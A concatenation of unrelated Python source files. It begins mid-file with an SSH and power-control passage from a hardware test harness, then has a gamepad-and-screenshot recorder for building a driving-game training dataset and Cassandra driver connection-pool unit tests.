{command}.",exc=exc,exitCode=EXIT.Run,overrideShutdown=overrideShutdown) # tell warning message thread that the expect is finished stopEvent.set() if (isinstance(endsWith,str)): #only one string textBack += endsWith elif ((endsWith not in [pexpect.EOF, pexpect.TIMEOUT]) and isinstance(endsWith[retExpect],str)): #list textBack += endsWith[retExpect] return [textBack, False, retExpect] @decorate.debugWrap @decorate.timeWrap def terminateTarget (self): self.terminateTargetStarted = True poweroffCommand = {'debian' : 'poweroff -f', 'FreeBSD' : 'halt -p', 'busybox' : 'poweroff -f'} if (self.osImage in poweroffCommand): if (self.isSshConn and (not self.onlySsh)): #only shutdown on tty if possible self.closeSshConn() if (self.binarySource=='MIT'): endsWith = 'Power down' elif ((self.target == 'vcu118') and (not self.isSshConn)): #On vcu118, the uart serial connection (through fdpexpect) won't be killed endsWith = 'Power off' else: endsWith = pexpect.EOF timeout = 120 if (self.processor=='bluespec_p3') else 60 self.runCommand(poweroffCommand[self.osImage],endsWith=endsWith,suppressErrors=True) if (self.onlySsh): self.closeSshConn() elif (self.osImage=='FreeRTOS'): if (getSetting('mode') in ['fettTest', 'fettProduction']): freertos.terminateAppStack(self) else: self.terminateAndExit(f"terminateTarget: not implemented for <{self.osImage}> on <{self.target}>.",exitCode=EXIT.Implementation) self.tearDown() return @decorate.debugWrap @decorate.timeWrap def tearDown(self): if (self.targetTearDownCalled): #Do not execute twice return self.targetTearDownCalled = True self.targetTearDown() try: self.fTtyOut.close() except Exception as exc: warnAndLog("terminateTarget: Failed to close the <tty> out file.",doPrint=False,exc=exc) return @decorate.debugWrap def clearHostKey (self): ipUpdateECDSA = self.ipTarget if (not self.sshHostPort) else f"[{self.ipTarget}]:{self.sshHostPort}" self.fSshOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ssh{self.targetSuffix}.out'),'ab') try: subprocess.check_call (['ssh-keygen', '-R', ipUpdateECDSA],stdout=self.fSshOut,stderr=self.fSshOut) except Exception as exc: warnAndLog(f"openSshConn: Failed to clear the target's ECDSA key. 
Will continue anyway.",exc=exc,doPrint=False) self.sshECDSAkeyWasUpdated = True self.fSshOut.close() @decorate.debugWrap @decorate.timeWrap def openSshConn (self,userName='root',endsWith=None,timeout=60,specialTest=False): def returnFail (message,exc=None,returnSpecial=False): self.killSshConn() if (returnSpecial): return 'BLOCKED_IP' warnAndLog (message,doPrint=False,exc=exc) extraMsg = ' Trying again...' if (self.sshRetries < self.sshLimitRetries-1) else '' warnAndLog(f"openSshConn: Failed to open an SSH connection for <{userName}>.{extraMsg}",doPrint=(not specialTest)) self.sshRetries += 1 return self.openSshConn (userName=userName, endsWith=endsWith, timeout=timeout, specialTest=specialTest) if (self.osImage not in ['FreeBSD','debian']): self.terminateAndExit(f"<openSshConn> is not implemented for <{self.osImage}>.",exitCode=EXIT.Dev_Bug) if (self.sshRetries >= self.sshLimitRetries): #to protect it from excessive attempts return False if (userName == 'root'): self.enableSshOnRoot() portPart = '' if (not self.sshHostPort) else f" -p {self.sshHostPort}" sshCommand = f"env -u SSH_AUTH_SOCK ssh{portPart} {userName}@{self.ipTarget}" sshPassword = self.rootPassword if (userName=='root') else self.userPassword #Need to clear the ECDSA key first in case it is not the first time if (not self.sshECDSAkeyWasUpdated): self.clearHostKey() self.killSshConn() self.fSshOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ssh{self.targetSuffix}.out'),'ab') try: self.sshProcess = pexpect.spawn(sshCommand,logfile=self.fSshOut,timeout=timeout) except Exception as exc: return returnFail(f"openSshConn: Failed to spawn an Ssh connection.",exc=exc) self.genStdinEntropy(endsWith=self.getAllEndsWith()) self.isSshConn = True self.process = self.sshProcess passwordPrompt = [f"Password for {userName}@[\w\-\.]+\:", f"{userName}@[\w\-\.]+\'s password\:"] blockedIpResponse = ["Connection closed by remote host", "Connection reset by peer", "Permission denied (publickey,keyboard-interactive)."] retExpect = self.expectFromTarget(passwordPrompt + blockedIpResponse + ['\)\?',pexpect.EOF],"openSshConn", timeout=timeout,exitOnError=False,issueInterrupt=False) if (retExpect[1]): #Failed return returnFail(f"openSshConn: Spawning the ssh process timed out.") elif (retExpect[2]==5): # asking for yes/no for new host retYes = self.runCommand("yes",endsWith=passwordPrompt+blockedIpResponse+[pexpect.EOF], timeout=timeout,exitOnError=False,issueInterrupt=False) if (retYes[3] not in [0,1]): #No password prompt return returnFail(f"openSshConn: Unexpected outcome when responding <yes> to the ssh process.", returnSpecial=(specialTest and (retYes[3] in [2,3,4,5]))) elif (retExpect[2] in [2,3,4,6]): #the ip was blocked or connection refused return returnFail(f"openSshConn: Unexpected response when spawning the ssh process.",returnSpecial=specialTest) retPassword = self.runCommand(sshPassword,endsWith=endsWith,timeout=timeout, exitOnError=False,issueInterrupt=False) if (not retPassword[0]): return returnFail(f"openSshConn: Failed to login to the SSH connection.") self.sshRetries = 0 #reset the retries return True @decorate.debugWrap def killSshConn (self): #Only for FreeBSD and Debian if (self.sshProcess is not None): try: self.sshProcess.terminate(force=True) self.sshProcess = None except Exception as exc: warnAndLog(f"killSshConn: Failed to terminate the sshProcess.\n",exc=exc,doPrint=False) self.isSshConn = False self.process = self.ttyProcess @decorate.debugWrap def closeSshConn (self, timeout=60): if (self.osImage not in 
['FreeBSD','debian']): self.terminateAndExit(f"<closeSshConn> is not implemented for <{self.osImage}>.",exitCode=EXIT.Dev_Bug) if (self.isSshConn and (self.sshProcess is not None)): self.runCommand("exit", endsWith=pexpect.EOF, timeout=timeout, suppressErrors=True, exitOnError=False, issueInterrupt=False) try: self.fSshOut.close() except Exception as exc: warnAndLog(f"closeSshConn: Failed to close the ssh{self.targetSuffix}.out file.",doPrint=False) self.killSshConn() return True @decorate.debugWrap def pingTarget (self,exitOnError=True,pingAttempts=3,printSuccess=True): #pinging the target to check everything is ok pingOut = ftOpenFile(os.path.join(getSetting('workDir'),f'ping{self.targetSuffix}.out'),'a') wasPingSuccessful = False for iPing in range(pingAttempts): try: subprocess.check_call(['ping', '-c', '1', '-W', '5', self.ipTarget],stdout=pingOut,stderr=pingOut) wasPingSuccessful = True break except Exception as exc: if (iPing < pingAttempts - 1): errorAndLog (f"Failed to ping the target at IP address <{self.ipTarget}>. Trying again ({iPing+2}/{pingAttempts})...",doPrint=False,exc=exc) time.sleep(10) else: pingOut.close() if (exitOnError): self.terminateAndExit(f"Failed to ping the target at IP address <{self.ipTarget}>.",exc=exc,exitCode=EXIT.Network) else: errorAndLog (f"Failed to ping the target at IP address <{self.ipTarget}>.",doPrint=False,exc=exc) return False pingOut.close() doPrintSuccess = printSuccess and (not (isEqSetting('mode','evaluateSecurityTests') and (self.osImage=='FreeRTOS'))) printAndLog (f"{self.targetIdInfo}IP address is set to be <{self.ipTarget}>. Pinging successfull!", doPrint=doPrintSuccess) return True @decorate.debugWrap def genStdinEntropy (self,endsWith=None): if ((not self.hasHardwareRNG()) and (not self.onlySsh)): lenText = 240 # Please do not use a larger string. 
there might be a UART buffer issue on firesim, should be resolved soon alphabet = string.ascii_letters + string.digits + ' ' randText = ''.join(random.choice(alphabet) for i in range(lenText)) self.runCommand(f"echo \"{randText}\"",endsWith=endsWith,timeout=60,exitOnError=False) def hasHardwareRNG (self): return ( ((self.target=='awsf1') and (self.pvAWS in ['firesim', 'connectal'])) or ((self.target=='qemu') and (self.osImage=='debian')) ) def hasGdbAccess (self): return ( (self.target=='vcu118') or ((self.target=='awsf1') and (self.pvAWS in ['firesim', 'connectal'])) ) @decorate.debugWrap @decorate.timeWrap def getGdbOutput(self): message = f"getGdbOutput is not implemented for <{self.targetInfo}>" warnAndLog(message,doPrint=False) return message @decorate.debugWrap def startGdbDebug(self): warnAndLog(f"<gdbDebug> is not implemented for <{self.targetInfo}>.") return @decorate.debugWrap def endGdbDebug(self): warnAndLog(f"<gdbDebug> is not implemented for <{self.targetInfo}>.") return @decorate.debugWrap @decorate.timeWrap def enableSshOnRoot (self): if (self.isSshRootEnabled): return #nothing to do switchUsers = not self.isCurrentUserRoot if (switchUsers): self.switchUser() #has to be executed on root # sshd_config location if (self.binarySource == 'SRI-Cambridge'): sshdConfigPath = "/fett/etc/sshd_config" else: #default sshdConfigPath = "/etc/ssh/sshd_config" self.runCommand (f"echo \"PermitRootLogin yes\" >> {sshdConfigPath}") self.retartSshService() self.isSshRootEnabled = True if (switchUsers): self.switchUser() #switch back if ((self.processor == 'bluespec_p3') or ((self.target == 'awsf1') and (self.osImage == 'FreeBSD'))): #needs time to take effect time.sleep(15) @decorate.debugWrap @decorate.timeWrap def retartSshService (self): if (not self.isCurrentUserRoot): self.switchUser() #has to be executed on root if (self.osImage=='debian'): self.runCommand ("service ssh restart") if (self.osImage=='FreeBSD'): if (self.binarySource=='SRI-Cambridge'): self.runCommand("service fett_sshd restart") elif (self.target in ['awsf1','qemu']): self.runCommand("pkill -f /usr/sbin/sshd") self.runCommand("/usr/sbin/sshd") else: self.runCommand("/etc/rc.d/sshd restart",timeout=120 if (self.procLevel=='p3') else 60) @decorate.debugWrap @decorate.timeWrap def findPort(self,portUse='unspecified'): #this seems wasteful, but it ensures thread-safe checks without using the networkLock for iPort in range(self.portsBegin,self.portsEnd+1,self.portsStep): if (checkPort(iPort)): self.portsBegin = iPort + self.portsStep return iPort self.terminateAndExit(f"{self.targetIdInfo}findPort: Failed to find an unused port" f" in the range of <{self.portsBegin}:{self.portsEnd}> for <{portUse}>.", exitCode=EXIT.Network) # END OF CLASS commonTarget @decorate.debugWrap def checkPort (portNum, host=''): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as iSock: try: iSock.bind((host, portNum)) return True except OSError as error: if (error.errno is not errno.EADDRINUSE): errorAndLog (f"checkPort: Encountered OS Error #{error} while checking port #{portNum}.",doPrint=False) else: #for readability pass #used port except Exception as exc: errorAndLog (f"checkPort: Encountered a non recognized error while checking port #{portNum}.",exc=exc,doPrint=False) return False @decorate.debugWrap def showElapsedTime (trash,estimatedTime=60,stdout=sys.stdout): def showTime(stopThread): startTime = time.time() minutesEst, secondsEst = divmod(estimatedTime, 60) estimatedPrefix = "Estimated ~{:0>2}:{:0>2} 
".format(int(minutesEst),int(secondsEst)) if (isEqSetting('besspinEntrypoint','devHost')): showTimePrefix = f"{estimatedPrefix}----- Elapsed: " else: stdout.write(f"{estimatedPrefix}\n") while (not stopThread.is_set()): minutes, seconds = divmod(time.time() - startTime, 60) if (isEqSetting('besspinEntrypoint','devHost')): stdout.write(showTimePrefix + "{:0>2}:{:0>2}\r".format(int(minutes),int(seconds))) stdout.flush () time.sleep(0.25) if (isEqSetting('besspinEntrypoint','devHost')): stdout.write(' ' * (len(showTimePrefix)+5) + '\r') completedMsg = "Estimated ~{:0>2}:{:0>2} ----- Completed in {:0>2}:{:0>2}\n".format(int(minutesEst),int(secondsEst),int(minutes),int(seconds)) stdout.write(completedMsg) stdout.flush() logging.info(completedMsg) stopTimeTrack = threading.Event() runTimeTrack = threading.Thread(target=showTime, kwargs=dict(stopThread=stopTimeTrack)) runTimeTrack.daemon = True trash.throwThread(runTimeTrack,"Showing time thread") stopTimeTrack.clear() runTimeTrack.start() return stopTimeTrack @decorate.debugWrap def charByCharEncoding (inBytes): if (not isinstance(inBytes, Iterable)): return '' textBack = '' for xByte in inBytes: try: xChar = chr(xByte) except UnicodeDecodeError: xChar = '<!>' textBack += xChar return textBack @decorate.debugWrap def getAddrOfAdaptor (ethAdaptor,addrType,exitIfNoAddr=True): def noAddrFound(errMessage): if (exitIfNoAddr): logAndExit(f"getAddrOfAdaptor: Failed to {errMessage}. Please check the network configuration.",exitCode=EXIT.Network) else: printAndLog(f"getAddrOfAdaptor: Failed to {errMessage}.",doPrint=False) return 'NotAnAddress' if (addrType == 'MAC'): family = psutil.AF_LINK elif (addrType == 'IP'): family = socket.AF_INET else: logAndExit (f"getAddrOfAdaptor: Unrecognized address type <{addrType}> is up.",exitCode=EXIT.Dev_Bug) if (ethAdaptor not in psutil.net_if_addrs()): return noAddrFound(f"find the adaptor <{ethAdaptor}>") for addr in psutil.net_if_addrs()[ethAdaptor]: if (addr.family == family): printAndLog(f"getAddrOfAdaptor: <{addrType} address> of <{ethAdaptor}> = <{addr.address}>",doPrint=False) return addr.address return noAddrFound(f"get the <{addrType} address> of <{ethAdaptor}>")
utils.py
""" Author: Norio Kosaka ==== joystick input ==== x = self.JoystickX y = self.JoystickY forward = self.A jump = self.RightBumper use_item = self.C_left ==== Joystick output vector ==== [x, y, forward, jump, use_item] """ from PIL import ImageTk, Image from inputs import get_gamepad from skimage.transform import resize from skimage.io import imread import numpy as np import mss, time, math, threading, sys, argparse, os, collections import warnings warnings.filterwarnings("ignore") # ====== Global variables definitions ====== # window position SRC_W = 640 SRC_H = 480 SRC_D = 3 # joystick related variables OFFSET_X = 0 OFFSET_Y = 0 MAX_JOY_VAL_N64 = math.pow(2,8) MAX_JOY_VAL_PS4 = math.pow(2,15) # image sizes of input X IMG_W = 200 IMG_H = 66 IMG_D = 3 # file location OUTPUTDIR = "./temp/" INPUT_DATA_CSV = "./temp/data.csv" # skip frame rate SKIP_FRAME = 2 # ====== Class Definition ====== class Data_bot(): """ This module has the funtionality of taking screenshot and recording the inputs from the controller """ def __init__(self, record_verbose=1, controller_type="PS4"): self.record_verbose = record_verbose self.controller_type = controller_type self._t = 0 self.num_episode = 0 self.screen_capture = mss.mss() self.outfile = open(INPUT_DATA_CSV, 'a') self.JoystickX = 0 self.JoystickY = 0 self.A = 0 self.RightBumper = 0 self.C_left = 0 self._monitor_thread = threading.Thread(target=self._monitor_controller, args=()) self._monitor_thread.daemon = True self._monitor_thread.start() self._img = collections.deque(maxlen=2) self.X = list() self.y = list() def _monitor_controller(self): """ Using threading, a spawned process keeps maintaining the state of this class Then, whenever read_data is called, we can get the current information(capture and inputs from the controller) """ if self.controller_type == "N64": while True: events = get_gamepad() for event in events: # remove noise if ((event.code == 'ABS_Z') and (event.state in [130,131,132,133,134,135,136,137,138,139])) or (event.code == 'SYN_REPORT'): pass else: # joystick: right(237) or left(30) if event.code == 'ABS_Z': self.JoystickX = event.state / MAX_JOY_VAL_N64 # normalise data between 0 and 1 elif event.code == 'ABS_Y': self.JoystickY = event.state / MAX_JOY_VAL_N64 # normalise data between 0 and 1 elif (event.code == 'MSC_SCAN') and (event.state == 589831): self.A = 1 elif (event.code == 'MSC_SCAN') and (event.state == 589830): self.RightBumper = 1 elif (event.code == 'MSC_SCAN') and (event.state == 589826): self.C_left = 1 elif self.controller_type == "PS4": while True: events = get_gamepad() for event in events: if event.code == 'ABS_X': self.JoystickX = event.state / MAX_JOY_VAL_PS4 # normalise data between 0 and 1 elif event.code == 'ABS_Y': self.JoystickY = event.state / MAX_JOY_VAL_PS4 # normalise data between 0 and 1 elif event.code == 'BTN_SOUTH': self.A = 1 elif event.code == 'BTN_TR': self.RightBumper = 1 elif event.code == 'BTN_EAST': self.C_left = 1 def _buffer_reset(self): """ After reading the data, we refresh the buffer """ self.JoystickX = 0 self.JoystickY = 0 # self.A = 0 self.RightBumper = 0 self.C_left = 0 def dev_screen_shot(self): """ take a screenshot of the defined region on the screen """ sct_img = self.screen_capture.grab({ "top" : OFFSET_Y, "left" : OFFSET_X, "width" : SRC_W, "height": SRC_H }) # Create the Image return Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX') def screen_shot(self): """ take a screenshot of the defined region on the screen """ sct_img = self.screen_capture.grab({ "top" : 
OFFSET_Y, "left" : OFFSET_X, "width" : SRC_W, "height": SRC_H }) # return the resized numpy array represents the image im = np.array(Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX').getdata()) return resize(im, (IMG_H, IMG_W, IMG_D)) def dev_save_data(self): """ Save data into outputDir """ image_file = OUTPUTDIR + 'img_' + str(self.t) + '.png' self.img.save(image_file) # write csv line self.outfile.write( image_file + ',' + ','.join(map(str, self.controller_data)) + '\n' ) def save_data(self): """ Save data into outputDir """ print("\n==== SAVING TO FILE... ====") self.X = np.asarray(self.X) self.y = np.asarray(self.y) # directly save the data in numpy array format np.save("data/X_ep_{0}".format(self.num_episode), self.X) np.save("data/y_ep_{0}".format(self.num_episode), self.y) # keep the track of the number of episode self.num_episode += 1 # refresh the memory self.X = list() self.y = list() print("==== DONE ====") def read_data(self): """ Read data """ x = self.JoystickX y = self.JoystickY forward = self.A jump = self.RightBumper use_item = self.C_left if self.record_verbose: print(x, y, forward, jump, use_item) self._buffer_reset() return [x, y, forward, jump, use_item] def dev_main(self): """ Main loop """ self.img = self.dev_screen_shot() self.controller_data = self.read_data() self.dev_save_data() def main(self): """ Main loop with skiping frame """ # we store the data once in N(SKIP_FRAME) steps if self._t == SKIP_FRAME: self._image = np.max(np.stack(self._img), axis=0) self.controller_data = self.read_data() # store a numpy array of an image and y self.X.append(self._image) self.y.append(self.controller_data) self._t = 0 # put the image to the queue which has the length of 2 self._img.append(self.screen_shot()) self._t += 1 # ====== Utility functions ====== def record(bot): try: while True: bot.main() except KeyboardInterrupt: bot.save_data() def check_raw_input(): """ investigate the raw_input from the controller """ while True: events = get_gamepad() for event in events: print(event.code, event.state) # ====== Dev purpose functions ====== def dev_record(record_verbose): bot = Data_bot(record_verbose) while True: bot.dev_main() def dev_prepare(): X, y = list(), list() # load sample image_files = np.loadtxt(INPUT_DATA_CSV, delimiter=',', dtype=str, usecols=(0,)) joystick_values = np.loadtxt(INPUT_DATA_CSV, delimiter=',', usecols=(1,2,3,4,5)) # add joystick values to y y.append(joystick_values) # load, prepare and add images to X _t = 0 image = collections.deque(maxlen=2) for image_file in image_files: image = imread(image_file) _t += 1 if _t == SKIP_FRAME: # take maximum value of two successive frames image = np.max(np.stack(image), axis=0) im = resize(image, (IMG_H, IMG_W, IMG_D)) vec = im.reshape((IMG_H, IMG_W, IMG_D)) X.append(vec) _t = 0 print("==== SAVING TO FILE... ====") X = np.asarray(X) y = np.concatenate(y) # directly save the data in numpy array format np.save("data/X", X) np.save("data/y", y) print("==== DONE ====") def dev_check_data(): """ check the basic stats of the recorded data """ import pandas as pd df = pd.read_csv(INPUT_DATA_CSV) df.columns = ['path','x', 'y', 'f', 'j', 'u'] print(df.describe()) def dev_clean_up(num_episode): """ garbage collection function. 
Before moving on to the another episode, we remove the all files in `temp` """ # os.system("rm -rf temp") # os.system("mkdir temp") os.system("mv ./data/X.npy ./data/X_ep_{0}.npy".format(num_episode)) os.system("mv ./data/y.npy ./data/y_ep_{0}.npy".format(num_episode)) print("HOLD ON A SECOND") time.sleep(1) def aggregate(num_episodes): print("==== AGGREGATION: START ====") for i in range(num_episodes): if i == 0: X = np.load("data/X_ep_{0}.npy".format(i)) y = np.load("data/y_ep_{0}.npy".format(i)) else: temp_X = np.load("data/X_ep_{0}.npy".format(i)) temp_y = np.load("data/y_ep_{0}.npy".format(i)) np.concatenate((X, temp_X), axis=0) np.concatenate((y, temp_y), axis=0) os.system("rm ./data/X_*") os.system("rm ./data/y_*") np.save("data/X", X) np.save("data/y", y) print("==== AGGREGATION: DONE ====") if __name__ == '__main__': # refresh the directory os.system("rm ./data/*") # define args for this program parser = argparse.ArgumentParser() parser.add_argument("--experiment", help="Record the demo and store the outcome to `temp` directory") parser.add_argument("--controller_type", help="What kind of controller are you using? Choose : N64 or PS4") parser.add_argument("--num_episodes", help="how many times you would like to record?") parser.add_argument("--record_verbose", help="flag to specify if you would like to see the verbose of inputs") parser.add_argument("--check_raw_input", help="check the raw input from the current gamepad") args = parser.parse_args() if args.experiment == "0": for i in range(int(args.num_episodes)): try: print("""==== Episode: {0}/{1} ====\nTo start recording: PRESS Enter\nTo stop recording : PRESS Ctrl + c""".format(i+1, int(args.num_episodes))) _in = input() print("==== START RECORDING ====") dev_record(args.record_verbose) except KeyboardInterrupt: print("==== FINISH RECORDING ====") print("==== START PREPARING DATA ====") dev_prepare() dev_clean_up(i) aggregate(int(args.num_episodes)) elif args.experiment == "1": bot = Data_bot(record_verbose=args.record_verbose, controller_type=args.controller_type) for i in range(int(args.num_episodes)): try: print("""==== Episode: {0}/{1} ====\nTo start recording: PRESS Enter\nTo stop recording : PRESS Ctrl + c""".format(i+1, int(args.num_episodes))) _in = input() print("==== START RECORDING ====") record(bot) except KeyboardInterrupt: print("==== FINISH RECORDING ====") pass aggregate(int(args.num_episodes)) elif args.check_raw_input == "1": check_raw_input() else: print('hello')
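# --- Editor's sketch (not part of the original recording script above) ---
# As written, aggregate() never assigns the result of np.concatenate, so after the
# per-episode files are deleted only episode 0 survives in data/X.npy and data/y.npy.
# A corrected, standalone version of the same aggregation step is sketched below;
# aggregate_episodes is an illustrative name, and the file layout
# (data/X_ep_<i>.npy, data/y_ep_<i>.npy) follows the script above.
import numpy as np

def aggregate_episodes(num_episodes, data_dir="data"):
    xs, ys = [], []
    for i in range(num_episodes):
        # Load each recorded episode (saved by Data_bot.save_data above).
        xs.append(np.load(f"{data_dir}/X_ep_{i}.npy"))
        ys.append(np.load(f"{data_dir}/y_ep_{i}.npy"))
    # Keep the concatenated result this time.
    X = np.concatenate(xs, axis=0)
    y = np.concatenate(ys, axis=0)
    np.save(f"{data_dir}/X", X)
    np.save(f"{data_dir}/y", y)
    return X.shape, y.shape

# Example use after recording three episodes:
#   aggregate_episodes(3)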
test_host_connection_pool.py
# Copyright DataStax, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. try: import unittest2 as unittest except ImportError: import unittest # noqa from mock import Mock, NonCallableMagicMock from threading import Thread, Event, Lock from cassandra.cluster import Session from cassandra.connection import Connection from cassandra.pool import HostConnection, HostConnectionPool from cassandra.pool import Host, NoConnectionsAvailable from cassandra.policies import HostDistance, SimpleConvictionPolicy class _PoolTests(unittest.TestCase): PoolImpl = None uses_single_connection = None def make_session(self): session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace') session.cluster.get_core_connections_per_host.return_value = 1 session.cluster.get_max_requests_per_connection.return_value = 1 session.cluster.get_max_connections_per_host.return_value = 1 return session def test_borrow_and_return(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) c, request_id = pool.borrow_connection(timeout=0.01) self.assertIs(c, conn) self.assertEqual(1, conn.in_flight) conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace') pool.return_connection(conn) self.assertEqual(0, conn.in_flight) if not self.uses_single_connection: self.assertNotIn(conn, pool._trash) def test_failed_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) conn.in_flight = conn.max_request_id # we're already at the max number of requests for this connection, # so we this should fail self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) def test_successful_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock()) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) def get_second_conn(): c, request_id = pool.borrow_connection(1.0) self.assertIs(conn, c) pool.return_connection(c) t = Thread(target=get_second_conn) t.start() pool.return_connection(conn) t.join() self.assertEqual(0, conn.in_flight) def test_spawn_when_at_max(self): host 
= Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) conn.max_request_id = 100 session.cluster.connection_factory.return_value = conn # core conns = 1, max conns = 2 session.cluster.get_max_connections_per_host.return_value = 2 pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) # make this conn full conn.in_flight = conn.max_request_id # we don't care about making this borrow_connection call succeed for the # purposes of this test, as long as it results in a new connection # creation being scheduled self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) if not self.uses_single_connection: session.submit.assert_called_once_with(pool._create_new_connection) def test_return_defunct_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_defunct = True session.cluster.signal_connection_failure.return_value = False pool.return_connection(conn) # the connection should be closed a new creation scheduled self.assertTrue(session.submit.call_args) self.assertFalse(pool.is_shutdown) def test_return_defunct_connection_on_down_host(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_defunct = True session.cluster.signal_connection_failure.return_value = True pool.return_connection(conn) # the connection should be closed a new creation scheduled self.assertTrue(session.cluster.signal_connection_failure.call_args) self.assertTrue(conn.close.call_args) self.assertFalse(session.submit.called) self.assertTrue(pool.is_shutdown) def test_return_closed_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_closed = True session.cluster.signal_connection_failure.return_value = False pool.return_connection(conn) # a new creation should be scheduled self.assertTrue(session.submit.call_args) self.assertFalse(pool.is_shutdown) def test_host_instantiations(self): """ Ensure Host fails if not initialized properly """ self.assertRaises(ValueError, Host, None, None) self.assertRaises(ValueError, Host, '127.0.0.1', None) self.assertRaises(ValueError, Host, None, SimpleConvictionPolicy) def test_host_equality(self): """ Test host equality has correct logic """ a = Host('127.0.0.1', 
SimpleConvictionPolicy) b = Host('127.0.0.1', SimpleConvictionPolicy) c = Host('127.0.0.2', SimpleConvictionPolicy) self.assertEqual(a, b, 'Two Host instances should be equal when sharing.') self.assertNotEqual(a, c, 'Two Host instances should NOT be equal when using two different addresses.') self.assertNotEqual(b, c, 'Two Host instances should NOT be equal when using two different addresses.') class HostConnectionPoolTests(_PoolTests): PoolImpl = HostConnectionPool uses_single_connection = False def test_all_connections_trashed(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock()) session.cluster.connection_factory.return_value = conn session.cluster.get_core_connections_per_host.return_value = 1 # manipulate the core connection setting so that we can # trash the only connection pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.get_core_connections_per_host.return_value = 0 pool._maybe_trash_connection(conn) session.cluster.get_core_connections_per_host.return_value = 1 submit_called = Event() def fire_event(*args, **kwargs): submit_called.set() session.submit.side_effect = fire_event def get_conn(): conn.reset_mock() c, request_id = pool.borrow_connection(1.0) self.assertIs(conn, c) self.assertEqual(1, conn.in_flight) conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace') pool.return_connection(c) t = Thread(target=get_conn) t.start() submit_called.wait() self.assertEqual(1, pool._scheduled_for_creation) session.submit.assert_called_once_with(pool._create_new_connection) # now run the create_new_connection call pool._create_new_connection() t.join() self.assertEqual(0, conn.in_flight) class HostConnectionTests(_PoolTests): PoolImpl = HostConnection uses_single_connection = True
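# --- Illustrative addition, not part of the original test module -----------
# The tests above rebuild an almost identical NonCallableMagicMock connection
# in every case.  A minimal sketch of a factory helper that could remove that
# duplication; the name `make_mock_connection` is an assumption and does not
# exist in the driver's test suite.
def make_mock_connection(**overrides):
    """Build a mock Connection with the defaults the pool tests rely on."""
    defaults = dict(in_flight=0, is_defunct=False, is_closed=False,
                    max_request_id=100, lock=Lock())
    defaults.update(overrides)
    return NonCallableMagicMock(spec=Connection, **defaults)

# Example use inside a test body (illustrative):
#   conn = make_mock_connection(is_closed=True)
#   session.cluster.connection_factory.return_value = conn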
__init__.py
